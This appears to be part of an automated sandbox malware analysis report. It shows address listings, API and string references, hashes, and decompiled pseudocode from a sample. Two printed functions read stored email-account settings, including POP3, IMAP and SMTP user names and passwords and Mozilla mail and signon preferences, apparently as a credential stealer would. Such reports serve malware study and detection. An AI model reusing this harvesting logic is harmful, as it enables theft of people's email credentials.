                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410487
                                                                                                                                                                        0x004102c6
                                                                                                                                                                        0x004102c9
                                                                                                                                                                        0x004102cc
                                                                                                                                                                        0x004102d0
                                                                                                                                                                        0x004102da
                                                                                                                                                                        0x004102e0
                                                                                                                                                                        0x004102e5
                                                                                                                                                                        0x004102ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004102ec
                                                                                                                                                                        0x004102f0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004102f2
                                                                                                                                                                        0x004102fa
                                                                                                                                                                        0x00410405
                                                                                                                                                                        0x00410405
                                                                                                                                                                        0x00410409
                                                                                                                                                                        0x0041040c
                                                                                                                                                                        0x00410414
                                                                                                                                                                        0x0041041c
                                                                                                                                                                        0x00410425
                                                                                                                                                                        0x0041042a
                                                                                                                                                                        0x0041042f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410431
                                                                                                                                                                        0x00410438
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041043a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041043a
                                                                                                                                                                        0x0041046e
                                                                                                                                                                        0x00410471
                                                                                                                                                                        0x00410472
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410472
                                                                                                                                                                        0x00410300
                                                                                                                                                                        0x00410300
                                                                                                                                                                        0x00410304
                                                                                                                                                                        0x00410309
                                                                                                                                                                        0x004103ba
                                                                                                                                                                        0x004103ba
                                                                                                                                                                        0x004103be
                                                                                                                                                                        0x004103c0
                                                                                                                                                                        0x004103cf
                                                                                                                                                                        0x004103cf
                                                                                                                                                                        0x004103d3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103c6
                                                                                                                                                                        0x004103d8
                                                                                                                                                                        0x004103da
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103e2
                                                                                                                                                                        0x004103eb
                                                                                                                                                                        0x004103f0
                                                                                                                                                                        0x004103f8
                                                                                                                                                                        0x004103fb
                                                                                                                                                                        0x004103fe
                                                                                                                                                                        0x004103ff
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103ff
                                                                                                                                                                        0x004103c8
                                                                                                                                                                        0x004103cc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103ce
                                                                                                                                                                        0x004103ce
                                                                                                                                                                        0x004103d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410318
                                                                                                                                                                        0x00410318
                                                                                                                                                                        0x0041031a
                                                                                                                                                                        0x00410340
                                                                                                                                                                        0x00410340
                                                                                                                                                                        0x00410344
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410337
                                                                                                                                                                        0x004103b5
                                                                                                                                                                        0x0041034a
                                                                                                                                                                        0x0041034e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041035c
                                                                                                                                                                        0x00410364
                                                                                                                                                                        0x0041036d
                                                                                                                                                                        0x00410372
                                                                                                                                                                        0x0041037d
                                                                                                                                                                        0x0041038c
                                                                                                                                                                        0x00410394
                                                                                                                                                                        0x00410395
                                                                                                                                                                        0x00410399
                                                                                                                                                                        0x004103a5
                                                                                                                                                                        0x004103ab
                                                                                                                                                                        0x004103ac
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004103ac
                                                                                                                                                                        0x00410339
                                                                                                                                                                        0x0041033d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041033f
                                                                                                                                                                        0x0041033f
                                                                                                                                                                        0x00410346
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00410346
                                                                                                                                                                        0x00410309
                                                                                                                                                                        0x00410325
                                                                                                                                                                        0x0041032b
                                                                                                                                                                        0x0041032c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041032c
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • strlen.MSVCRT ref: 004102D0
                                                                                                                                                                        • strncmp.MSVCRT(?,00414FF4,00000000,00414FF4,?,?,?), ref: 004102E0
                                                                                                                                                                        • memcpy.MSVCRT ref: 0041035C
                                                                                                                                                                        • atoi.MSVCRT ref: 0041036D
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00410399
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                        • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                        • API String ID: 1895597112-3210201812
                                                                                                                                                                        • Opcode ID: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
                                                                                                                                                                        • Instruction ID: 0fafc75884cef128377fd64f4b7a28f8ddc93d47313dbc0ddeda27c5dc7f40ea
                                                                                                                                                                        • Opcode Fuzzy Hash: f81056c634e1afed85b28816bcd2f342141d731626830ff6453ade7d9a479c77
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FF1D5B1805A98DEDF21CF94C9887DDBBB0BB85308F1481CAD5586B241C7B94AC9CF9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00410D67 Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E00410D67(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t63;
				void* _t96;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t123;
				void* _t194;
				void* _t196;
				void* _t201;
				char* _t202;

				_t194 = __edx;
				_t201 = __ecx;
				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
					_t204 = _t201 + 0x460;
					E004060DA(0xff, _t201 + 0x870, E00406BA3( *(_t201 + 0x460)));
					_t123 = E00406BA3( *_t204);
					_t195 = _t201 + 0xf84;
					E004060DA(0xff, _t201 + 0xf84, _t123);
				}
				_t202 = _t201 + 0x46c;
				if(strcmp(_t202, "POP3_Server") == 0) {
					_t117 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060DA(0xff, _t201 + 0x970, _t117);
				}
				if(strcmp(_t202, "IMAP_Server") == 0) {
					_t114 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060DA(0xff, _t201 + 0x970, _t114);
				}
				if(strcmp(_t202, "NNTP_Server") == 0) {
					_t111 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060DA(0xff, _t201 + 0x970, _t111);
				}
				if(strcmp(_t202, "SMTP_Server") == 0) {
					_t108 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1084;
					E004060DA(0xff, _t201 + 0x1084, _t108);
				}
				if(strcmp(_t202, "POP3_User_Name") == 0) {
					_t105 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060DA(0xff, _t201 + 0xb70, _t105);
					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
				}
				if(strcmp(_t202, "IMAP_User_Name") == 0) {
					_t102 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060DA(0xff, _t201 + 0xb70, _t102);
					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
				}
				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060DA(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406BA3( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060DA(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410BCE(E00406BA3( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060DA(0xff, _t201 + 0xe70, E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060DA(0xff, _t201 + 0xe70, E00406BA3( *(_t201 + 0x460)));
					_t63 = E004060DA(0xff, _t201 + 0x1584, E00406BA3( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004120B4();
				if(_t63 == 0) {
					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004120B4();
				if(_t63 == 0) {
					L35:
					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004120B4();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004120B4();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004120B4();
				if(_t63 == 0) {
					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004120B4();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004120B4();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004120B4();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}























                                                                                                                                                                        0x00410d67
                                                                                                                                                                        0x00410d6b
                                                                                                                                                                        0x00410d87
                                                                                                                                                                        0x00410d89
                                                                                                                                                                        0x00410d9e
                                                                                                                                                                        0x00410da7
                                                                                                                                                                        0x00410dad
                                                                                                                                                                        0x00410db3
                                                                                                                                                                        0x00410db8
                                                                                                                                                                        0x00410dbe
                                                                                                                                                                        0x00410dce
                                                                                                                                                                        0x00410dd6
                                                                                                                                                                        0x00410ddc
                                                                                                                                                                        0x00410de2
                                                                                                                                                                        0x00410de7
                                                                                                                                                                        0x00410df7
                                                                                                                                                                        0x00410dff
                                                                                                                                                                        0x00410e05
                                                                                                                                                                        0x00410e0b
                                                                                                                                                                        0x00410e10
                                                                                                                                                                        0x00410e20
                                                                                                                                                                        0x00410e28
                                                                                                                                                                        0x00410e2e
                                                                                                                                                                        0x00410e34
                                                                                                                                                                        0x00410e39
                                                                                                                                                                        0x00410e49
                                                                                                                                                                        0x00410e51
                                                                                                                                                                        0x00410e57
                                                                                                                                                                        0x00410e5d
                                                                                                                                                                        0x00410e62
                                                                                                                                                                        0x00410e72
                                                                                                                                                                        0x00410e7a
                                                                                                                                                                        0x00410e80
                                                                                                                                                                        0x00410e86
                                                                                                                                                                        0x00410e8c
                                                                                                                                                                        0x00410e8c
                                                                                                                                                                        0x00410ea5
                                                                                                                                                                        0x00410ead
                                                                                                                                                                        0x00410eb3
                                                                                                                                                                        0x00410eb9
                                                                                                                                                                        0x00410ebf
                                                                                                                                                                        0x00410ebf
                                                                                                                                                                        0x00410ed8
                                                                                                                                                                        0x00410ee0
                                                                                                                                                                        0x00410ee6
                                                                                                                                                                        0x00410eec
                                                                                                                                                                        0x00410ef2
                                                                                                                                                                        0x00410ef2
                                                                                                                                                                        0x00410f0b
                                                                                                                                                                        0x00410f13
                                                                                                                                                                        0x00410f19
                                                                                                                                                                        0x00410f1f
                                                                                                                                                                        0x00410f25
                                                                                                                                                                        0x00410f25
                                                                                                                                                                        0x00410f35
                                                                                                                                                                        0x00410f3a
                                                                                                                                                                        0x00410f3e
                                                                                                                                                                        0x00410f53
                                                                                                                                                                        0x00410f53
                                                                                                                                                                        0x00410f5e
                                                                                                                                                                        0x00410f63
                                                                                                                                                                        0x00410f67
                                                                                                                                                                        0x00410f7c
                                                                                                                                                                        0x00410f7c
                                                                                                                                                                        0x00410f87
                                                                                                                                                                        0x00410f8c
                                                                                                                                                                        0x00410f90
                                                                                                                                                                        0x00410fa5
                                                                                                                                                                        0x00410fa5
                                                                                                                                                                        0x00410fb0
                                                                                                                                                                        0x00410fb5
                                                                                                                                                                        0x00410fb9
                                                                                                                                                                        0x00410fce
                                                                                                                                                                        0x00410fce
                                                                                                                                                                        0x00410fe2
                                                                                                                                                                        0x00410ff6
                                                                                                                                                                        0x00410ffb
                                                                                                                                                                        0x00411002
                                                                                                                                                                        0x0041100b
                                                                                                                                                                        0x0041100d
                                                                                                                                                                        0x00411022
                                                                                                                                                                        0x00411037
                                                                                                                                                                        0x0041103c
                                                                                                                                                                        0x0041103d
                                                                                                                                                                        0x00411042
                                                                                                                                                                        0x00411048
                                                                                                                                                                        0x00411049
                                                                                                                                                                        0x00411052
                                                                                                                                                                        0x00411060
                                                                                                                                                                        0x00411066
                                                                                                                                                                        0x00411066
                                                                                                                                                                        0x0041106c
                                                                                                                                                                        0x00411071
                                                                                                                                                                        0x00411072
                                                                                                                                                                        0x0041107b
                                                                                                                                                                        0x0041109f
                                                                                                                                                                        0x004110ab
                                                                                                                                                                        0x004110b1
                                                                                                                                                                        0x0041107d
                                                                                                                                                                        0x0041107d
                                                                                                                                                                        0x00411082
                                                                                                                                                                        0x00411083
                                                                                                                                                                        0x0041108c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041108e
                                                                                                                                                                        0x0041108e
                                                                                                                                                                        0x00411093
                                                                                                                                                                        0x00411094
                                                                                                                                                                        0x0041109d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041109d
                                                                                                                                                                        0x0041108c
                                                                                                                                                                        0x004110b7
                                                                                                                                                                        0x004110bc
                                                                                                                                                                        0x004110bd
                                                                                                                                                                        0x004110c6
                                                                                                                                                                        0x004110d4
                                                                                                                                                                        0x004110da
                                                                                                                                                                        0x004110da
                                                                                                                                                                        0x004110e0
                                                                                                                                                                        0x004110e5
                                                                                                                                                                        0x004110e6
                                                                                                                                                                        0x004110ef
                                                                                                                                                                        0x00411113
                                                                                                                                                                        0x00411125
                                                                                                                                                                        0x004110f1
                                                                                                                                                                        0x004110f1
                                                                                                                                                                        0x004110f6
                                                                                                                                                                        0x004110f7
                                                                                                                                                                        0x00411100
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00411102
                                                                                                                                                                        0x00411102
                                                                                                                                                                        0x00411107
                                                                                                                                                                        0x00411108
                                                                                                                                                                        0x00411111
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00411111
                                                                                                                                                                        0x00411100
                                                                                                                                                                        0x00411132

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcmp$_stricmp$memcpystrlen
                                                                                                                                                                        • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                        • API String ID: 1113949926-2499304436
                                                                                                                                                                        • Opcode ID: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
                                                                                                                                                                        • Instruction ID: fdd8238c1ffaca80b8f1a937c0ff3988063f93198c4aeb5310ca970d52cdd6dd
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E9160B21097049DE628B632ED02BDB73D8AF4431CF21052FF55AE6182EEBDB991465C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040C9AA Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E0040C9AA(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void _v271;
				char _v272;
				void* __ebx;
				void* __edi;
				int _t64;
				int _t66;
				int _t68;
				int _t69;
				int _t72;
				int _t85;
				void* _t91;
				void* _t132;
				char* _t133;
				char* _t135;
				char* _t137;
				char* _t139;
				intOrPtr _t151;
				int _t153;
				int _t154;
				void* _t155;

				_t132 = __edx;
				_v12 = __ecx;
				_v272 = 0;
				memset( &_v271, 0, 0xff);
				_t133 = "mail.account.account";
				_t64 = strlen(_t133);
				_t148 = _t64;
				_t134 = _a4;
				if(strncmp(_a4, _t133, _t64) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C923(_t134,  &_v16, _t148);
				}
				if(_v8 != 0) {
					_push("identities");
					_push(_v8);
					L00412072();
					if(_t91 == 0) {
						_t17 = _t155 + 0x604; // 0x604
						E004060DA(0xff, _t17, _a8);
					}
				}
				_t135 = "mail.server";
				_t66 = strlen(_t135);
				_t149 = _t66;
				_t136 = _a4;
				if(strncmp(_a4, _t135, _t66) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C8CE(_t149, _t136,  &_v272);
				}
				if(_v8 != 0) {
					_t85 = E0040CC58(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("username");
					_push(_v8);
					_t154 = _t85;
					L00412072();
					if(_t85 == 0) {
						_t28 = _t154 + 0x204; // 0x204
						_t85 = E004060DA(0xff, _t28, _a8);
					}
					_push("type");
					_push(_v8);
					L00412072();
					if(_t85 == 0) {
						_t31 = _t154 + 0x504; // 0x504
						_t85 = E004060DA(0xff, _t31, _a8);
					}
					_push("hostname");
					_push(_v8);
					L00412072();
					if(_t85 == 0) {
						_t34 = _t154 + 0x104; // 0x104
						_t85 = E004060DA(0xff, _t34, _a8);
					}
					_push("port");
					_push(_v8);
					L00412072();
					if(_t85 == 0) {
						_t85 = atoi(_a8);
						 *(_t154 + 0x804) = _t85;
					}
					_push("useSecAuth");
					_push(_v8);
					L00412072();
					if(_t85 == 0) {
						_push("true");
						_push(_a8);
						L00412072();
						if(_t85 == 0) {
							 *((intOrPtr*)(_t154 + 0x808)) = 1;
						}
					}
				}
				_t137 = "mail.identity";
				_t68 = strlen(_t137);
				_t150 = _t68;
				_t138 = _a4;
				_t69 = strncmp(_a4, _t137, _t68);
				if(_t69 != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_t69 = E0040C8CE(_t150, _t138,  &_v272);
					_v8 = _t69;
				}
				if(_v8 != 0) {
					_t69 = E0040CC58(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("useremail");
					_push(_v8);
					_t153 = _t69;
					L00412072();
					if(_t69 == 0) {
						_t51 = _t153 + 0x404; // 0x404
						_t69 = E004060DA(0xff, _t51, _a8);
					}
					_push("fullname");
					_push(_v8);
					L00412072();
					if(_t69 == 0) {
						_t54 = _t153 + 4; // 0x4
						_t69 = E004060DA(0xff, _t54, _a8);
					}
				}
				_push("signon.signonfilename");
				_push(_a4);
				L00412072();
				if(_t69 == 0) {
					_t151 = _v12;
					_t139 = _t151 + 0x245;
					_t152 = _t151 + 0x140;
					_t72 = strlen(_t151 + 0x140);
					_t60 = strlen(_a8) + 1; // 0x1
					if(_t72 + _t60 >= 0x104) {
						 *_t139 = 0;
					} else {
						E004062B7(_t139, _t152, _a8);
					}
				}
				return 1;
			}


























                                                                                                                                                                        0x0040c9aa
                                                                                                                                                                        0x0040c9c5
                                                                                                                                                                        0x0040c9c8
                                                                                                                                                                        0x0040c9cf
                                                                                                                                                                        0x0040c9d4
                                                                                                                                                                        0x0040c9da
                                                                                                                                                                        0x0040c9df
                                                                                                                                                                        0x0040c9e3
                                                                                                                                                                        0x0040c9f1
                                                                                                                                                                        0x0040ca02
                                                                                                                                                                        0x0040c9f3
                                                                                                                                                                        0x0040c9fd
                                                                                                                                                                        0x0040c9fd
                                                                                                                                                                        0x0040ca0a
                                                                                                                                                                        0x0040ca3e
                                                                                                                                                                        0x0040ca43
                                                                                                                                                                        0x0040ca46
                                                                                                                                                                        0x0040ca4f
                                                                                                                                                                        0x0040ca54
                                                                                                                                                                        0x0040ca5a
                                                                                                                                                                        0x0040ca5f
                                                                                                                                                                        0x0040ca4f
                                                                                                                                                                        0x0040ca60
                                                                                                                                                                        0x0040ca66
                                                                                                                                                                        0x0040ca6b
                                                                                                                                                                        0x0040ca6f
                                                                                                                                                                        0x0040ca7d
                                                                                                                                                                        0x0040ca92
                                                                                                                                                                        0x0040ca7f
                                                                                                                                                                        0x0040ca8d
                                                                                                                                                                        0x0040ca8d
                                                                                                                                                                        0x0040ca9a
                                                                                                                                                                        0x0040caad
                                                                                                                                                                        0x0040cab2
                                                                                                                                                                        0x0040cab7
                                                                                                                                                                        0x0040caba
                                                                                                                                                                        0x0040cabc
                                                                                                                                                                        0x0040cac5
                                                                                                                                                                        0x0040caca
                                                                                                                                                                        0x0040cad0
                                                                                                                                                                        0x0040cad5
                                                                                                                                                                        0x0040cad6
                                                                                                                                                                        0x0040cadb
                                                                                                                                                                        0x0040cade
                                                                                                                                                                        0x0040cae7
                                                                                                                                                                        0x0040caec
                                                                                                                                                                        0x0040caf2
                                                                                                                                                                        0x0040caf7
                                                                                                                                                                        0x0040caf8
                                                                                                                                                                        0x0040cafd
                                                                                                                                                                        0x0040cb00
                                                                                                                                                                        0x0040cb09
                                                                                                                                                                        0x0040cb0e
                                                                                                                                                                        0x0040cb14
                                                                                                                                                                        0x0040cb19
                                                                                                                                                                        0x0040cb1a
                                                                                                                                                                        0x0040cb1f
                                                                                                                                                                        0x0040cb22
                                                                                                                                                                        0x0040cb2b
                                                                                                                                                                        0x0040cb30
                                                                                                                                                                        0x0040cb36
                                                                                                                                                                        0x0040cb36
                                                                                                                                                                        0x0040cb3c
                                                                                                                                                                        0x0040cb41
                                                                                                                                                                        0x0040cb44
                                                                                                                                                                        0x0040cb4d
                                                                                                                                                                        0x0040cb4f
                                                                                                                                                                        0x0040cb54
                                                                                                                                                                        0x0040cb57
                                                                                                                                                                        0x0040cb60
                                                                                                                                                                        0x0040cb62
                                                                                                                                                                        0x0040cb62
                                                                                                                                                                        0x0040cb60
                                                                                                                                                                        0x0040cb4d
                                                                                                                                                                        0x0040cb6c
                                                                                                                                                                        0x0040cb72
                                                                                                                                                                        0x0040cb77
                                                                                                                                                                        0x0040cb7b
                                                                                                                                                                        0x0040cb7f
                                                                                                                                                                        0x0040cb89
                                                                                                                                                                        0x0040cb9e
                                                                                                                                                                        0x0040cb8b
                                                                                                                                                                        0x0040cb94
                                                                                                                                                                        0x0040cb99
                                                                                                                                                                        0x0040cb99
                                                                                                                                                                        0x0040cba6
                                                                                                                                                                        0x0040cbb5
                                                                                                                                                                        0x0040cbba
                                                                                                                                                                        0x0040cbbf
                                                                                                                                                                        0x0040cbc2
                                                                                                                                                                        0x0040cbc4
                                                                                                                                                                        0x0040cbcd
                                                                                                                                                                        0x0040cbd2
                                                                                                                                                                        0x0040cbd8
                                                                                                                                                                        0x0040cbdd
                                                                                                                                                                        0x0040cbde
                                                                                                                                                                        0x0040cbe3
                                                                                                                                                                        0x0040cbe6
                                                                                                                                                                        0x0040cbef
                                                                                                                                                                        0x0040cbf4
                                                                                                                                                                        0x0040cbf7
                                                                                                                                                                        0x0040cbfc
                                                                                                                                                                        0x0040cbef
                                                                                                                                                                        0x0040cbfd
                                                                                                                                                                        0x0040cc02
                                                                                                                                                                        0x0040cc05
                                                                                                                                                                        0x0040cc0e
                                                                                                                                                                        0x0040cc10
                                                                                                                                                                        0x0040cc13
                                                                                                                                                                        0x0040cc19
                                                                                                                                                                        0x0040cc20
                                                                                                                                                                        0x0040cc2f
                                                                                                                                                                        0x0040cc3a
                                                                                                                                                                        0x0040cc4b
                                                                                                                                                                        0x0040cc3c
                                                                                                                                                                        0x0040cc42
                                                                                                                                                                        0x0040cc48
                                                                                                                                                                        0x0040cc3a
                                                                                                                                                                        0x0040cc55

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040C9CF
                                                                                                                                                                        • strlen.MSVCRT ref: 0040C9DA
                                                                                                                                                                        • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C9E7
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,server), ref: 0040CA24
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,identities), ref: 0040CA46
                                                                                                                                                                        • strlen.MSVCRT ref: 0040CA66
                                                                                                                                                                        • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040CA73
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040CABC
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040CADE
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040CB00
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040CB22
                                                                                                                                                                        • atoi.MSVCRT ref: 0040CB30
                                                                                                                                                                          • Part of subcall function 0040C923: memset.MSVCRT ref: 0040C959
                                                                                                                                                                          • Part of subcall function 0040C923: memcpy.MSVCRT ref: 0040C97B
                                                                                                                                                                          • Part of subcall function 0040C923: atoi.MSVCRT ref: 0040C98F
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040CB44
                                                                                                                                                                        • _stricmp.MSVCRT(?,true,00000000), ref: 0040CB57
                                                                                                                                                                        • strlen.MSVCRT ref: 0040CB72
                                                                                                                                                                        • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040CB7F
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040CBC4
                                                                                                                                                                        • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CBE6
